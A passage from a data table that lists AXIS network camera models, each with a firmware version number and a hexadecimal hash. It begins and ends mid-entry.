6d377ea9ea99068e910b416ccc73d8ca\nAXIS M3037 5.75.1.1 ef69c662079018e19e988663ad1fc509\nAXIS M3113-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\nAXIS M3113-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\nAXIS M3114-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\nAXIS M3114-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\nAXIS M3203 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61\nAXIS M3204 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61\nAXIS M5013 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205\nAXIS M5014 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205\nAXIS M7010 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d\nAXIS M7011 5.90.1 362658a55d4f2043ed435c72588bd7e7\nAXIS M7014 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d\nAXIS M7016 5.51.2.3 b3de957bbca166f145969a6884050979\nAXIS P1204 5.50.6 3ffe1a771565b61567f917621c737866\nAXIS P1214 5.50.6 3ffe1a771565b61567f917621c737866\nAXIS P1224 5.50.6 3ffe1a771565b61567f917621c737866\nAXIS P1343 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60\nAXIS P1344 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60\nAXIS P1346 5.40.9.6 c89ee1e7c54b4728612277e18be1c939\nAXIS P1347 5.40.9.6 f0f95768e367c3a2a8999a0bd8902969\nAXIS P1353 5.60.1.5 0f59d0e34301519908754af850fdfebb\nAXIS P1354 5.90.1 120c230067b7e000fa31af674f207f03\nAXIS P1355 5.60.1.5 5dbec1d7b8b6f337581da6ec668a9aad\nAXIS P1357 5.90.1 d83472c4d545763e5b05cd6d0c63430f\nAXIS P1364 5.85.4 2db00322be0b8c939c89fe4f3e0fd67d\nAXIS P1365 5.75.3.2 1eba3426b2046e696d80ea253fe5e9b6\nAXIS P1405 5.80.1.1 4db97061feb3cf91eb0cded516f9c5af\nAXIS P1425 5.80.1.1 e9213ed81dc68f07c854a990889995ba\nAXIS P1427 5.80.1.1 dfe4cd28b929e78d42e8fc8c98616a7c\nAXIS P1428-E 5.80.1.1 7a65a0b0e4050824de0d46a1725ad0ea\nAXIS P1435 5.85.4.1 219467e77dcb3195d7203a79ecd30474\nAXIS P3214 6.10.1 00fca61c0a97dfc5e670a308cbda14d4\nAXIS P3215 6.10.1 00fca61c0a97dfc5e670a308cbda14d4\nAXIS P3224 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6\nAXIS P3225 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6\nAXIS P3301 5.40.9.4 27b7a421f7e3511f3a4b960c80b42c56\nAXIS P3304 5.40.9.4 df9e2159c4eadf5e955863c7c5691b1a\nAXIS P3343 5.40.9.8 dd752099f8b2c48b91914ec32484f532\nAXIS P3344 5.40.9.8 dd752099f8b2c48b91914ec32484f532\nAXIS P3346 5.50.3.1 d30498356187ba44f94f31398b04a476\nAXIS P3353 5.60.1.4 fa4924480563924a0365268f8eef8864\nAXIS P3354 6.10.1 d2f317d88dea1f001ce8151106e0322b\nAXIS P3363 5.60.1.5 4b3175a30893a270e5dca8fc405b5d7e\nAXIS P3364 6.10.1 6128c6ba026a68a5759b08971504807e\nAXIS P3365 6.10.1 f26b0616c595622abb17ce4411dee2b2\nAXIS P3367 6.10.1 8dad67aae2ffaee6fb147d6942476f00\nAXIS P3384 6.10.1 138ff1bdc97d025f8f31a55e408e2a1d\nAXIS P3904-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be\nAXIS P3905-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be\nAXIS P3915-R 5.80.1 1dcf4a39c7e7349629ade723f563e892\nAXIS P5414-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee\nAXIS P5415-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee\nAXIS P5512 95.50.4.2 a2d5aab90d51af80d924bb3cc8b249fc\nAXIS P5512-E 5.50.4.2 4fd5d721e27fe0f4db7d652bd1730749\nAXIS P5514-E 5.85.3 b1fc3d26f6293b94f042ac6ea3aa8271\nAXIS P5515 5.85.3 99b2512b57ed8a12c6ad2e53adc8acf8\nAXIS P5515-E 5.85.3 639388e504a0841cad2eee7374476727\nAXIS P5522 5.50.4.3 8335552031bc297ce87666542f0e3106\nAXIS P5522-E 5.50.4.2 218e1b6997f0e5338f86f0ed1b12f8a0\nAXIS P5532 5.41.3.1 b1ab3dd8ed126dd68b4793dec9bf3698\nAXIS P5532-E 5.41.3.1 f6322413687d169dce61459d8338a611\nAXIS P5534 5.40.9.5 3b94922050bec9bc436dce3fcd9bcfaf\nAXIS P5534-E 5.40.9.6 a931bc58ee0e882b359dbecd3d699c52\nAXIS P5544 5.41.2.2 cb5bcec36f839914db93eaf17ae83e5e\nAXIS P5624-E 5.75.1.1 b93952a6083aa628026f145a1dffa313\nAXIS P5635-E 5.75.1.1 24d32e4fab54f16b5698ff4e477fc188\nAXIS P7210 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1\nAXIS P7214 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1\nAXIS P7216 5.51.2.1 a77e96832f7d87970bf286288ce2ca81\nAXIS P7224 5.51.2.1 5d5ecf065f456e66eb42d9360d22f863\nAXIS P8514 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\nAXIS Q1615 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44\nAXIS Q1635 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44\nAXIS Q1635-E 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44\nAXIS Q1755 5.50.4.1 6ca8597f48ed122ce84c2172c079cdf9\nAXIS Q1765-LE 5.90.1.1 7930bf5c4c947f2f948f8b7475f01409\nAXIS Q1765-LE-PT 5.90.1.1 890ba75a8108d97f2ef1a4aecedf76b1\nAXIS Q1775 5.85.3 f47bc9d46a913561e42b999cc6697a83\nAXIS Q1910 5.50.4.1 71525d4d56d781318b64e8200806dcf0\nAXIS Q1921 5.50.4.1 82f956fec96a9068941e24e12045cefd\nAXIS Q1922 5.50.4.1 111a1a4f823e7281af1c872ba52f73c4\nAXIS Q1931-E 5.75.1.3 5cf13a2c3d65644c3376ec6466dd9b49\nAXIS Q1931-E-PT-Mount5.75.1.1 3ba7e187dc25e98ab73aef262b68e1b9\nAXIS Q1932-E 5.75.1.2 b8efe54fc3eca7f2a59322779e63e8e1\nAXIS Q1932-E PT.Mount5.75.1 513fc031f85542548eeccfeaa7c1a29e\nAXIS Q2901-E 5.55.4.1 d2945717297edab3326179541cfa0688\nAXIS Q2901-E PT.Mount5.55.4.1 a41aed45359f11d2ec248419c124a52d\nAXIS Q3505 5.80.1.4 9394b3577bdb17cb9f74e56433a0e660\nAXIS Q3709-PVE 5.75.1.1 e9fb87337c0a24139a40459336f0bcb3\nAXIS Q6000-E 5.65.1.1 b97df19057db1134a43c26f5ddf484de\nAXIS Q6032 5.41.1.2 8caad5cd7beeebaf5b05b011b8a1e104\nAXIS Q6032-C 5.41.3 58213a4b1c7a980dcb3b54bbee657506\nAXIS Q6032-E 5.41.1.4 b4aa977b254694b5d14d7e87e5652a6b\nAXIS Q6034 5.41.1.1 4f44a8661534bac08a50651ee90a7d47\nAXIS Q6034-C 5.41.3 25d455dc2e2d11639f29b0b381ddd7cb\nAXIS Q6034-E 5.41.1.2 3bfab61354170e42ce27fc2477d57026\nAXIS Q6035 5.41.1.2 9d124d096bf48fbfd2e11c34de3c880d\nAXIS Q6035-C 5.41.3 42d23ae4d0b1456cc54e54734a586d53\nAXIS Q6035-E 5.41.1.5 e2123a9e37fda4044847c810b7f25253\nAXIS Q6042 5.70.1.1 4f253ed4bb0efaa4a845e0e9bd666766\nAXIS Q6042-C 5.70.1.1 21bd154f706091b348c33dd9564438da\nAXIS Q6042-E 5.70.1.2 9d5dc03268638498d0299bf466fa0501\nAXIS Q6042-S 5.70.1.1 085fc5903d99899d78b48abb9cafdecd\nAXIS Q6044 5.70.1.1 29e4cdb9ba2f18953512c5d1e17229c1\nAXIS Q6044-C 5.70.1.1 dc3fc472b88e07278e6ff82eaee71a8d\nAXIS Q6044-E 5.70.1.2 83d1e6c1fe5aa9c26710eed03721f928\nAXIS Q6044-S 5.70.1.1 654ffd048fdb41ae3c86da4f41e2a31d\nAXIS Q6045 5.70.1.1 2db9b247729e9487f476a35a6dd456ce\nAXIS Q6045-C 5.70.1.1 9bb561126e2b4f69ac526cfccdf254f6\nAXIS Q6045-C-MkII 5.70.1.1 2c9efccb0fba0e63fc4fff73e6ba0fea\nAXIS Q6045-E 5.70.1.2 321a5d906863787fdc5e34483e6ec2a8\nAXIS Q6045-E-MkII 5.70.1.2 d9d4242a83b1ed225dd3c20530da034d\nAXIS Q6045-MkII 5.70.1.1 686f0fe8727e2a726091c9ddf3827741\nAXIS Q6045-S 5.70.1.1 43473e42f360efb4ea6f84da35fd9746\nAXIS Q6045-S-Mk-II 5.70.1.1 d747a5a3d69264af8448f72822e8d60b\nAXIS Q6114-E 5.65.2.1 8cb9a3a88c79ebb2cf5def3cda0da148\nAXIS Q6115-E 5.65.2.1 7d2dd3410ce505cd04a1c182917523a5\nAXIS Q6128-E 5.85.2.1 49508ff56508f809a75d367896e8d56f\nAXIS Q7401 5.50.4 99855c6c9777fdd5fc5e58349ae861a5\nAXIS Q7404 5.50.4.2 ffdbee7c9daad303e89a432ba9c4711d\nAXIS Q7404 5.50.4 6e31e9709cf9717968c244267aa8c6d0\nAXIS Q7406 5.51.2 3cdb7935278157b9c91c33
